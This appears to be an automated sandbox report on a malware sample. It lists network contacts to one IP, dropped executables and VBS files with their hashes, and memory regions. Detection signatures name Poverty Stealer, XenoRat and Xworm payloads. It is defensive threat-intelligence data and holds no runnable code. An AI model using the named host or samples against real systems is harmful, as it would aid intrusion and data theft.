| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp |
Files
memory/2356-0-0x000007FEF60D3000-0x000007FEF60D4000-memory.dmp
memory/2356-1-0x00000000009F0000-0x00000000009F8000-memory.dmp
memory/2356-2-0x000007FEF60D0000-0x000007FEF6ABC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabF865.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarF913.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
| MD5 | cfbd38c30f1100b5213c9dd008b6e883 |
| SHA1 | 03da6d72c9d92bea2b2e5c4a8538f0a3628fbe73 |
| SHA256 | 25350f356b356c9ab48ebfcca67cad970d1a213f8716a1d006d339a38f0f7cc5 |
| SHA512 | a7d3bce28d0443dbe671394bd6c720f0fba28cf18ee0a5c3bfe547c3ffaebb9431ebe40749de1eb460b03696a401c167d76de99e9769e33ca62a3bf8302a5b04 |
memory/2868-64-0x0000000000AD0000-0x0000000000F30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
| MD5 | 9c433a245d7737ca7fa17490e460f14e |
| SHA1 | 31e6388f4e45a97a97ac0f34c26a9858ef8dcdb9 |
| SHA256 | 0b6604d2e6086f7322c634ab925bdc381fe720a2a12f254e5b63b42f89b680f7 |
| SHA512 | edaf8ff778db40dfcacd7c8cb5cef598dc7c13ebfb6b4f8e828c0697b24115f637ac510c945d31b1c4873d39fca7d8be7b03ba6dc64e665def6bf2d058a00c95 |
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
| MD5 | b73ecb016b35d5b7acb91125924525e5 |
| SHA1 | 37fe45c0a85900d869a41f996dd19949f78c4ec4 |
| SHA256 | b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d |
| SHA512 | 0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d |
memory/940-89-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-88-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/940-86-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-92-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-94-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-91-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-84-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-82-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-80-0x0000000000400000-0x000000000040A000-memory.dmp
memory/940-78-0x0000000000400000-0x000000000040A000-memory.dmp
\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
| MD5 | 892d97db961fa0d6481aa27c21e86a69 |
| SHA1 | 1f5b0f6c77f5f7815421444acf2bdd456da67403 |
| SHA256 | c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719 |
| SHA512 | 7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241 |
memory/2868-101-0x0000000000AD0000-0x0000000000F30000-memory.dmp
memory/2868-102-0x0000000000AD0000-0x0000000000F30000-memory.dmp
memory/2356-103-0x000007FEF60D3000-0x000007FEF60D4000-memory.dmp
memory/2356-104-0x000007FEF60D0000-0x000007FEF6ABC000-memory.dmp
memory/940-105-0x0000000000400000-0x000000000040A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7828.vbs
| MD5 | 8b4ed5c47fdddbeba260ef11cfca88c6 |
| SHA1 | 868f11f8ed78ebe871f9da182d053f349834b017 |
| SHA256 | 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5 |
| SHA512 | 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf |
memory/2868-109-0x0000000008770000-0x000000000886A000-memory.dmp
memory/2868-115-0x0000000008870000-0x0000000008AF0000-memory.dmp
memory/2868-126-0x0000000002EA0000-0x0000000002EAC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1431.vbs
| MD5 | 34b33b5a437e20d03d79b62a797dfe99 |
| SHA1 | 9b57b598a7e9d66157a05a44bc7c097bf5486e6c |
| SHA256 | f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1 |
| SHA512 | 757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c |
C:\Users\Admin\AppData\Local\Temp\9471.vbs
| MD5 | bb8cfb89bce8af7384447115a115fb23 |
| SHA1 | 6a0e728f4953128db9db52474ae5608ecee9c9c3 |
| SHA256 | d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485 |
| SHA512 | d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3e932c5e76fc930556183bdecf5d8514 |
| SHA1 | 5668cdc99f64517a1154da8c5b6b74f50d864fe7 |
| SHA256 | 511dc2a2b6162fe23e02b8a3084ad5992a4812dcb055009e0424d36e5fd06d4c |
| SHA512 | fd61d6221ea958279490bcb2185dc2db5f72526e63f6cafd1856a2d4e53c242a6fcc5ff5a9dcda5d567ed4235db9e8ed6978cd5bdd0c3381b42607f3a1715776 |
C:\Users\Admin\AppData\Local\Temp\a\filer.exe
| MD5 | 9096f57fa44b8f20eebf2008a9598eec |
| SHA1 | 42128a72a214368618f5693df45b901232f80496 |
| SHA256 | f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934 |
| SHA512 | ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2 |
memory/2116-195-0x000000013F2F0000-0x0000000140D11000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
| MD5 | 73507ed37d9fa2b2468f2a7077d6c682 |
| SHA1 | f4704970cedac462951aaf7cd11060885764fe21 |
| SHA256 | c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6 |
| SHA512 | 3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369 |
memory/1832-206-0x000000001B440000-0x000000001B722000-memory.dmp
memory/1832-208-0x0000000002360000-0x0000000002368000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
| MD5 | 3273f078f87cebc3b06e9202e3902b5c |
| SHA1 | 03b1971e04c8e67a32f38446bd8bfac41825f9cc |
| SHA256 | 4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c |
| SHA512 | 2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9 |
memory/2672-215-0x0000000000B20000-0x0000000001A08000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
| MD5 | ce69d13cb31832ebad71933900d35458 |
| SHA1 | e9cadfcd08d79a2624d4a5320187ae84cf6a0148 |
| SHA256 | 9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf |
| SHA512 | 7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409 |
memory/1684-221-0x0000000000BF0000-0x0000000000BFE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
| MD5 | 4ea576c1e8f58201fd4219a86665eaa9 |
| SHA1 | efaf3759b04ee0216254cf07095d52b110c7361f |
| SHA256 | d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f |
| SHA512 | 0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494 |
memory/1492-234-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test12.exe
| MD5 | 5853f8769e95540175f58667adea98b7 |
| SHA1 | 3dcd1ad8f33b4f4a43fcb1191c66432d563e9831 |
| SHA256 | d58fee4abb20ce9214a9ed4ae8943a246a106bbe4f2b5332754c3b50ce7b0995 |
| SHA512 | c1393a51eea33279d86544c6c58b946ae909540a96edda07c19e21a24e55c51be34e45413aa5005e9aeedacbb7d38471027baa27c18dbc36a8359856da1a0d80 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 787a43b20154d8fef83e919433a53e25 |
| SHA1 | 56abff43d8ec620da54afa61505f37acd8eeaa58 |
| SHA256 | 0363186f421d8b27b0aceacf56e5d4a099fa673cc079967ab93ed1225a3d1d03 |
| SHA512 | 612a12f368fe4480b31671b058fb208fb868bc6149907f1c392ebb58289026f70c17f65891e2ec0ef1d2d881dc74cb3d3503d113866668a867b176b40590705f |
C:\Users\Admin\AppData\Local\Temp\a\test6.exe
| MD5 | 6383ec21148f0fb71b679a3abf2a3fcc |
| SHA1 | 21cc58ccc2e024fbfb88f60c45e72f364129580f |
| SHA256 | 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde |
| SHA512 | c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125 |
memory/1980-260-0x0000000000560000-0x00000000005B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test14.exe
| MD5 | f299d1d0700fc944d8db8e69beb06ddd |
| SHA1 | 902814ffd67308ba74d89b9cbb08716eec823ead |
| SHA256 | b105f79e0eac7079fc2998949eee28fb0bf7f9a08c4912477031ac8d7e897406 |
| SHA512 | 6821e6e9393cbd8471a0403052ac4d4df6e14dc0955deabd7709331dcf537f3076c08003001eab34788d53cf03fd61878a4b31aa7879f862627b28110f43e2ca |
memory/1712-297-0x0000000000560000-0x00000000005B4000-memory.dmp
memory/1712-298-0x0000000000800000-0x0000000000861000-memory.dmp
memory/1712-299-0x00000000003D0000-0x00000000003D3000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7dc66ce650110a50a49e47f44b9363d0 |
| SHA1 | 47ec6b4908c1c9957bfba3d959729a2691cd47c1 |
| SHA256 | 0d48d3cd8690ab7f9dab31eb0006ebe23bc99965c709adcfdffeb87e030923c3 |
| SHA512 | 2b3c90873d430a3534f28cbb70f67e75ecef8f7e57717eb8c4c13a1596743fe10560726cd88960b08d97086ac09afcd1e68dc3fb3635bb04ff521794e38dc78e |
\Users\Admin\AppData\Local\Temp\a\pantest.exe
| MD5 | 312f2c6630bd8d72279c8998acbbbeba |
| SHA1 | 8f11b84bec24f586a74d1c48d759ee9ec4ad9d54 |
| SHA256 | 706dccc82df58b5d49a8bcccc655a9dce0d47410bc922eb9a91108e5a1f82cfb |
| SHA512 | ed7eba574b4d6a07c582148583ed0532293366d15b5091580c6ddf9a45ed78a185163b2b713e77957cd99b03353ea8f778c8de50075b9d2924358b431fc0b37d |
memory/2928-334-0x00000000007C0000-0x0000000000814000-memory.dmp
\Users\Admin\AppData\Local\Temp\a\test9.exe
| MD5 | d399231f6b43ac031fd73874d0d3ef4d |
| SHA1 | 161b0acb5306d6b96a0eac17ba3bedb8c4a1b0f2 |
| SHA256 | 520db0cc6b1c86d163dff2797dcbc5f78b968313bedea85f7530830c87e0287f |
| SHA512 | b1d0b94b0b5bc65113a196276d0a983872885c4b59dd3473bcaa6c60f2051de4579a7bc41082a2016472a3ec7de8bcf3ac446e3f3cb27521327fe166284d3400 |
memory/1652-361-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
| MD5 | 6b0255a17854c56c3115bd72f7fc05bd |
| SHA1 | 0c5e1dfa655bcbb3ffad8e0e4471c41255de1dd5 |
| SHA256 | ce94cf176e146813c922782ded112003e45749cb07bb7c635241c1c39e54a36a |
| SHA512 | fac0df5995a050653aa160e2e7fb8275b5c5471ce8fad9fee7c97beda37a96c27b1a3ff4de5b35e164378e3abed7df0998f6117aabb45e7eb46841e02617d1c1 |
memory/2248-388-0x0000000000320000-0x0000000000374000-memory.dmp
memory/2248-389-0x0000000000380000-0x00000000003E1000-memory.dmp
memory/2248-390-0x00000000002D0000-0x00000000002D3000-memory.dmp
\Users\Admin\AppData\Local\Temp\a\test19.exe
| MD5 | 5a6d9e64bff4c52d04549bbbd708871a |
| SHA1 | ae93e8daf6293c222aa806e34fb3a209e202b6c7 |
| SHA256 | c2c06c7b68f9ac079a8e2dcab3a28df987613ec94dbb0b507da838de830dcaa8 |
| SHA512 | 97a2003e27257a4b4f2493b5f8e7d0d22ff539af4be3bc308fd2c3c3e0cff1bcbc222c26d8a01a1ccbf99d4c30403b464a8660dd340afe9d6d54b31651abf05a |
memory/2316-417-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test10.exe
| MD5 | 0f0e9f3b9a70d62ae4bc66a93b604146 |
| SHA1 | e516287a1a99aac6c296083a4545a6a6981a9352 |
| SHA256 | f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda |
| SHA512 | 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881 |
C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
| MD5 | b84e8b628bf7843026f4e5d8d22c3d4f |
| SHA1 | 12e1564ed9b706def7a6a37124436592e4ad0446 |
| SHA256 | b01b19c4d71f75f9ec295958a8d96a2639d995c20c133f4ffda2a2dabe8a7c28 |
| SHA512 | 080aa4ad9094f142aa0eae3ae3d4bce59d61d8b5664d397268316f3c19fa4a7c161acf522adc8da5f6413a9327915f99ecdfe568b84300a9b31e42eb625ed0cd |
memory/2264-470-0x00000000002C0000-0x0000000000314000-memory.dmp
memory/2264-480-0x0000000000400000-0x0000000000460000-memory.dmp
memory/2264-481-0x000007FEF1E20000-0x000007FEF1ECC000-memory.dmp
memory/2264-471-0x000007FEF1E20000-0x000007FEF1ECC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test23.exe
| MD5 | 956ec5b6ad16f06c92104365a015d57c |
| SHA1 | 5c80aaed35c21d448173e10b27f87e1bfe31d1eb |
| SHA256 | 8c3924e850481889d5423eb7131833b4e828bf289d3f1eb327d491cb85a30d61 |
| SHA512 | 443cd7b6763c1d9be3fbc061f015ba2298f664f70b908ae45e7db04019173a9288d6d30068300788a2bcd2aa694811094bfcb959e127fedb7da9cd042827e1d2 |
memory/1368-500-0x00000000002C0000-0x0000000000314000-memory.dmp
memory/2948-503-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test5.exe
| MD5 | c8ac43511b7c21df9d16f769b94bbb9d |
| SHA1 | 694cc5e3c446a3277539ac39694bfa2073be6308 |
| SHA256 | cb1eee26a7d2050feb980eccb69d35c05b5a0d28821972df19d974b386d9e4fe |
| SHA512 | a9c7cf19857b9600e77d14d06c3774e38c6e04d2a72d119273216cc2ab9242b583b5ce5a6829fcf1e1553865088d628c82be827d8cc322e4e97c24a5ddc04628 |
\??\pipe\crashpad_2580_CFRXFEFANDWRIDPL
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp
| MD5 | 18e723571b00fb1694a3bad6c78e4054 |
| SHA1 | afcc0ef32d46fe59e0483f9a3c891d3034d12f32 |
| SHA256 | 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa |
| SHA512 | 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2 |
memory/3040-534-0x0000000000770000-0x00000000007C4000-memory.dmp
memory/1980-536-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test11.exe
| MD5 | 2340185f11edd4c5b4c250ce5b9a5612 |
| SHA1 | 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727 |
| SHA256 | 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031 |
| SHA512 | 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/1712-565-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test20.exe
| MD5 | 153a52d152897da755d90de836a35ebf |
| SHA1 | 8ba5a2d33613fbafed2bb3218cf03b9c42377c26 |
| SHA256 | 10591da797b93e3607264825685f76d6327f4463bf21953e66600abc6550b213 |
| SHA512 | 3eb53a80e68efd134945b9e770166bad2147645bef7db41f585a7a1e9c7def45ff035bd91bad87b1daef3c6833c2f17a2c0fb33183a3c9327b40ccf59be45240 |
memory/3200-571-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
| MD5 | e501f77ff093ce32a6e0f3f8d151ee55 |
| SHA1 | c330a4460aef5f034f147e606b5b0167fb160717 |
| SHA256 | 9e808115bf83004226accb266fcbc6891f4c5bc7364d966e6f5de4717e6d8ed1 |
| SHA512 | 845548058034136bb6204ae04efcb37c9e43187c2b357715fcfd9986614095a0fcf1e103ab8d9f566dedb34a033f9f30a346cbdf9ee2e262dd8a44d5eaf72af2 |
memory/2928-577-0x0000000000400000-0x0000000000460000-memory.dmp
memory/1652-578-0x0000000000400000-0x0000000000460000-memory.dmp
memory/3520-579-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test16.exe
| MD5 | 9f88e470f85b5916800c763a876b53f2 |
| SHA1 | 4559253e6df6a68a29eedd91751ce288e846ebc8 |
| SHA256 | 0961766103f8747172f795b6cbf3c8ef06a1ded91fe49ff0f2f280cc326d1d9a |
| SHA512 | c4fc712ed346c3c40f33f2514f556e92d915a6d0257fdd8d174b3f87f8c34a9167cfaca58785b52b68a5e5c710656a6269e5d0e20eef7f63a6d06f658d53fb5d |
memory/3656-585-0x00000000002C0000-0x0000000000314000-memory.dmp
memory/2248-586-0x0000000000400000-0x0000000000460000-memory.dmp
memory/3752-593-0x00000000002C0000-0x0000000000314000-memory.dmp
memory/2316-616-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test13.exe
| MD5 | 44c1c57c236ef57ef2aebc6cea3b3928 |
| SHA1 | e7135714eee31f96c3d469ad5589979944d7c522 |
| SHA256 | 4c3618c90ca8fac313a7868778af190a3c22c8c03132505283b213da19ce9b7f |
| SHA512 | 99d0a428082d19bb28327698e8a06f78eee5a23134f037a4357c1ac4a6c9bb7d6ad454f28a2a546e8c7770423c64d6d951a074cd40711bc1bdcd40e59919934d |
C:\ProgramData\FCAAAAFBKFIE\FHIECB
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
memory/1948-642-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
| MD5 | 52a2fc805aa8e8610249c299962139ed |
| SHA1 | ab3c1f46b749a3ef8ad56ead443e26cde775d57d |
| SHA256 | 4801ead85ca08f439f695f198f5a87032c688143b3fe679b2b0872102c0d58ea |
| SHA512 | 2e6897092f3e25da023b003975f2fa5f45a4a2a115bc56460d15b21933da517fd7e1e98dcdad49196236614a516c710c19f4bfd4603776b620eb6d9c31c02cdf |
memory/4032-648-0x0000000000250000-0x00000000002A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test15.exe
| MD5 | 80e217c22855e1a2d177dde387a9568f |
| SHA1 | c136d098fcd40d76334327dc30264159fd8683f8 |
| SHA256 | 0ef39ccad2c162a5ab7dc13be3bba8f898fb38ba2f7357e840bd97456537decd |
| SHA512 | 6f658863ee676a07df7bbfc7b8a60bc591a6e8bf21c6f7147772e0b9beb223310c32da7436c202a4e804ce9e32128ec360618c3b273105e0f948d72859adc686 |
memory/3180-675-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test18.exe
| MD5 | a694c5303aa1ce8654670ff61ffda800 |
| SHA1 | 0dbc8ebd8b9dd827114203c3855db80cf40e57c0 |
| SHA256 | 994d0670d75433df8e0f2cce833d19d3045d3527143ce2ccf4cb4c04d4157a62 |
| SHA512 | b15856b54a018a71e71637e47e00b1c64154e24ae4c2a671dca25c43bccf4bbbf9da4445b6a7d48f62cab7da06c30fdd884d4bba21c5929a9569db0a288d9d9a |
memory/1692-684-0x0000000000760000-0x00000000007B4000-memory.dmp
memory/1368-685-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test21.exe
| MD5 | 3b8e201599a25cb0c463b15b8cae40a3 |
| SHA1 | 4a7ed64c4e1a52afbd21b1e30c31cb504b596710 |
| SHA256 | 407f4efed0f09c97d226da99b030bf628fcd9a2f8ee1416c1f4f1bd482d372a8 |
| SHA512 | fb5af97c3b5784ebdd3988179e970d9462aec283a41301f50f3cf31537538cef5e7534c6bb44b28ab5e1807ac85afb9490b6c30014ce9eb207030c3096921ac7 |
memory/3936-691-0x0000000000460000-0x00000000004B4000-memory.dmp
memory/2948-710-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test22.exe
| MD5 | e1c3d67db03d2fa62b67e6bc6038c515 |
| SHA1 | 334667884743a3f68a03c20d43c5413c5ada757c |
| SHA256 | 4ab79ee78e0abe5fff031d06a11f1de1a9e0c935097e1b829ad3e8b077700936 |
| SHA512 | 100c775bcf6ce70a82cb18884e1ca50f3cdd0be1b9f4f835e6c41c9820ff42c4fe3ca3d1fdc41d4f2e0f26dda5e5b85b3f555b88f11b58c5e81267706cafa3d7 |
memory/4028-717-0x000007FEEFC70000-0x000007FEEFD1C000-memory.dmp
memory/4028-719-0x000007FEEFC70000-0x000007FEEFD1C000-memory.dmp
memory/4028-718-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4028-716-0x0000000000460000-0x00000000004B4000-memory.dmp
memory/3040-732-0x0000000000400000-0x0000000000460000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test8.exe
| MD5 | cae51fb5013ed684a11d68d9f091e750 |
| SHA1 | 28842863733c99a13b88afeb13408632f559b190 |
| SHA256 | 67256a1f764ec403d8a1bcb009e701069b815db72869eae0b59dab1f23ebc8e8 |
| SHA512 | 492961ea16f34bafa9e8695eeffef94cc649e29d7ad9da8c02b4bc49c33878cf9d75d6cdb69f7ad6713f6e5296750bd52dc08b70cd6e6c0ad963de6ca87f0ec6 |
memory/3464-748-0x0000000000460000-0x00000000004B4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test7.exe
| MD5 | 2734a0771dc77ea25329ace845b85177 |
| SHA1 | 3108d452705ea5d29509b9ffd301e38063ca6885 |
| SHA256 | 29cfae62adef19cd2adf20e32908289270ebd3bdd52b407818b8f641bfb1314a |
| SHA512 | c400274d6682ad4dfae87fa53a272f3210262e083d6a966ce49711438b8e3a49ff0110e0d2b18007db8bbab54b8f8e4f0e18ba579a0f33b470e14324c3bc637b |
memory/3276-776-0x00000000005C0000-0x0000000000621000-memory.dmp
memory/3276-775-0x0000000000560000-0x00000000005B4000-memory.dmp
memory/3276-777-0x0000000000260000-0x0000000000263000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\test-again.exe
| MD5 | d9fd5136b6c954359e8960d0348dbd58 |
| SHA1 | 44800a8d776fd6de3e4246a559a5c2ac57c12eeb |
| SHA256 | 55eb3a38362b44d13ae622cc81df37d1d7089c15f6608fd46543df395569e816 |
| SHA512 | 86add0c5fd4d7eff19ce3828c2fe8501d51566cad047d7e480acf3e0bc227e3bda6a27aa65f7b2fd77d34cd009de73c98014d0323d8cf35ba06e5451eee5e9b0 |
C:\Users\Admin\AppData\Local\Temp\a\test17.exe
| MD5 | c821b813e6a0224497dada72142f2194 |
| SHA1 | 48f77776e5956d629363e61e16b9966608c3d8ff |
| SHA256 | bc9e52cd6651508e4128eb5cc7cab11825b0cb34d55d8db47b2689c770c1b0b1 |
| SHA512 | eab0164d5946a04e63dc05f26c4ed27d8fff36019a0faf46f8a548e304a5525a474eee37cb655600ac95bb16535cf74417056e931adff36c09203a192d83c676 |
C:\Users\Admin\AppData\Local\Temp\a\vg9qcBa.exe
| MD5 | 20160349422aeb131ed9da71a82eb7ab |
| SHA1 | bb01e4225a1e1797c9b5858d0edf063d5f8bc44f |
| SHA256 | d8f6ce51eba058276c4722747655b68711682afc5654414e8c195ada38fdc0ea |
| SHA512 | 907f3f61ac9ebeda534b3a330fd8673e8d09b243847b6a7a8d8d30f74ba8c699eafb8338a8d4f36824871609c1f226cb4db1e4a931fdf312f0e4331e7110c6b8 |
C:\Users\Admin\AppData\Local\Temp\a\win.exe
| MD5 | 73e0321f95791e8e56b6ae34dd83a198 |
| SHA1 | b1e794bb80680aa020f9d4769962c7b6b18cf22b |
| SHA256 | cae686852a33b1f53cdb4a8e69323a1da42b5b8ac3dd119780959a981305466b |
| SHA512 | cc7b0ddf8fdb779c64b4f9f8886be203efb639c5cad12e66434e98f7f8ac675aee1c893014d8c2a36761504b8b20b038a71413934b8bc8229fdde4f13c8d47bc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b881f8fa760b52ddd4c05328471f71a4 |
| SHA1 | 16f70bdaf151819fb401bbce4efddd03277c697b |
| SHA256 | 264065f289703c7cbf31bbc4952cb30f1f30020d1bbeb4baa973dea5cee46e33 |
| SHA512 | 5a01d1b1759c6dc8089f97b5f3c21ab327f247c2d8fa7be8a4bee10d4b5568185dea59495396f1e919ec1ec506d8d9a38e56b81fa2d3f96c322ea05b6f33224f |
memory/2500-1036-0x0000000000890000-0x0000000000902000-memory.dmp
memory/2500-1037-0x0000000000310000-0x0000000000316000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-26 22:53
Reported
2024-11-26 22:55
Platform
win10v2004-20241007-en
Max time kernel
115s
Max time network
119s
Command Line
Signatures
Detect Poverty Stealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect XenoRat Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
